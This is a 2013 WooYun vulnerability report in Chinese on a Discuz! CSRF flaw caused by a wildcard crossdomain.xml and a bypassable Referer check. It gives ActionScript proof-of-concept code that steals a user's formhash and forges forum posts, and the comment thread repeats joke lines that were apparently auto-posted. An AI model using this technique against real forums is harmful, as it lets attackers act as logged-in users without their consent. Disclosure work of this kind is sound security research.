当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038429

漏洞标题:Discuz!配置不当可导致CSRF发帖

相关厂商:Discuz!

漏洞作者: p.z

提交时间:2013-09-28 14:01

修复时间:2013-10-08 14:02

公开时间:2013-10-08 14:02

漏洞类型:应用配置错误

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-28: 细节已通知厂商并且等待厂商处理中
2013-10-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Discuz!配置不当可导致CSRF发帖

详细说明:

这个漏洞中评论说的 WooYun: Discuz!全版本鸡肋CSRF漏洞一枚 ,由于crossdomain.xml配置不当,可能会导致一些问题。评论时只是有个基本的印象,没有实测,既然xsser说有对这个的防御,那来看看是怎么防的.
crossdomain.xml的默认设置:

<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>


对dz的代码结构不熟,按黑盒来测。
首先是读取那个formhash,看来有了crossdomain.xml的帮助,很容易的读到了当前用户的formhash。

8.png


function gethash() {
    function getformhash(txt) {
        txt = txt.split('action=logout&amp;formhash=')[1].split('"')[0];
        return txt;
    }
    var result_lv:LoadVars = new LoadVars();
    result_lv.onData = function(txt) {
        if (txt) {
            txt = getformhash(txt);
        } else {
            txt = "Error connecting to server.";
        }
        trace(txt);
    };
    var send_lv:LoadVars = new LoadVars();
    method = 'GET';
    url = "http://localhost:8080/";
    send_lv.sendAndLoad(url,result_lv,method);
}
gethash()


然后是CSRF发帖,先构造个表单,提交,发现有对refer进行检查。

2.png


哦?那截包试试空refer,发现成功了

Q截图-20130928135512.png


那就瞎了,https到http的请求是不带refer,可以通过这办法绕过,估计用https架设论坛的没有几个吧,基本全是http的。

function dopost() {
    var result_lv:LoadVars = new LoadVars();
    result_lv.onData = function(txt) {
        trace(txt);
    };
    var send_lv:LoadVars = new LoadVars();
    method = 'post';
    url = "http://localhost:8080/forum.php?mod=post&action=newthread&fid=2&extra=&topicsubmit=yes";
    send_lv['formhash']='{{ form_hash }}'
    send_lv['posttime']='1380343694'
    send_lv['wysiwyg']='1'
    send_lv['subject']='111'
    send_lv['message']='123123213213131313'
    send_lv['price']=''
    send_lv['allownoticeauthor']='1'
    send_lv['addfeed']='1'
    send_lv['save']=''
    send_lv['connect_publish_t']='0'
    send_lv.sendAndLoad(url,result_lv,method);
}
dopost()

漏洞证明:

李菊福,不信?您找个https试试。

修复方案:

你们做个调查,到底那个crossdomain.xml有没有用,没用就撤了吧。

版权声明:转载请注明来源 p.z@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-10-08 14:02

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2013-09-28 14:04 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    发帖算啥啊 来把我密码改了啊

  2. 2013-09-28 14:11 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    发帖算啥啊 来把我密码改了啊

  3. 2013-09-28 14:16 | Mysterious-M ( 路人 | Rank:1 漏洞数:1 )

    发帖算啥啊 来把我密码改了啊

  4. 2013-09-28 14:26 | Anonymous ( 普通白帽子 | Rank:146 漏洞数:30 | 园长是大傻逼)

    发帖算啥啊 来把我密码改了啊

  5. 2013-09-28 14:38 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    ╮(╯▽╰)╭

  6. 2013-09-28 15:03 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    发帖算啥啊 来把我密码改了啊

  7. 2013-09-28 15:31 | Xpunk ( 路人 | Rank:4 漏洞数:1 | Music life)

    发帖算啥啊 来把我密码改了啊

  8. 2013-09-28 16:01 | q601333824 ( 普通白帽子 | Rank:217 漏洞数:49 | 出自《丹特丽安的书架》---吾问汝,汝为人否...)

    楼上全是自动发帖的,好牛B 0.0

  9. 2013-09-28 17:19 | Honker红颜 ( 普通白帽子 | Rank:156 漏洞数:51 | 皖南人士,90后宅男,自学成才,天朝教育失败....)

    发帖算啥啊 来把我密码改了啊

  10. 2013-09-28 19:26 | Skull ( 实习白帽子 | Rank:95 漏洞数:33 | 菜鸟一枚。)

    发帖算啥啊 来把我密码改了啊

  11. 2013-09-28 19:34 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    发帖算啥啊 来把我密码改了啊

  12. 2013-09-28 20:10 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    发帖算啥啊 来把我密码改了啊

  13. 2013-09-28 22:06 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    楼上的别发了,我的密码就被改了,hacker by:p.z 此号被射, WB已转

  14. 2013-09-28 23:40 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    记得貌似有token啊,难道是通用的。。

  15. 2013-09-29 08:34 | Leon ( 路人 | Rank:25 漏洞数:6 | 永无宁日啊)

    发帖算啥啊 来把我密码改了啊

  16. 2013-09-29 11:35 | iiiiiiiii ( 普通白帽子 | Rank:680 漏洞数:89 | )

    楼上的别发了,我的密码就被改了,hacker by:p.z 此号被射, WB已转

  17. 2013-09-29 19:08 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

    发帖算啥啊 来把我密码改了啊

  18. 2013-09-30 21:09 | 正好五个字 ( 实习白帽子 | Rank:93 漏洞数:15 )

    发帖算啥啊 来把我密码改了啊

  19. 2013-10-01 17:11 | Coxxs ( 实习白帽子 | Rank:34 漏洞数:8 | 节操数:233 | ww)

    发帖算啥啊 来把我密码改了啊

  20. 2013-10-01 18:57 | 乱人心xsser ( 路人 | Rank:3 漏洞数:1 | 渗透师|结界师|跨站师|安全工程师|系统工程...)

    发帖算啥啊 来把我密码改了啊

  21. 2013-10-03 05:06 | 猥琐 ( 路人 | Rank:6 漏洞数:2 | 学习什么的最重要!)

    楼上的别发了,我的密码就被改了,hacked by:p.z 此号白射了,一个钢镚都没有!

  22. 2013-10-08 14:56 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    楼上的别发了,我的密码就被改了,hacker by:p.z 此号被射, WB已转

  23. 2013-10-08 16:30 | Ki11 ( 路人 | Rank:26 漏洞数:5 | ส็็็็็็็็็็็็็็็็็็็...)

    楼上的别发了,我的密码就被改了,hacker by:p.z 此号被射, WB已转

  24. 2013-10-08 17:04 | jeary ( 普通白帽子 | Rank:296 漏洞数:106 | (:‮.kcaH eb nac gnihtynA))

    楼上的别发了,我的密码就被改了,hacker by:p.z 此号被射, WB已转

  25. 2013-10-12 13:21 | Hero ( 普通白帽子 | Rank:116 漏洞数:31 | 药药切克闹,充气娃娃迷幻药)

    楼上的别发了,我的密码就被改了,hacker by:p.z 此号被射, WB已转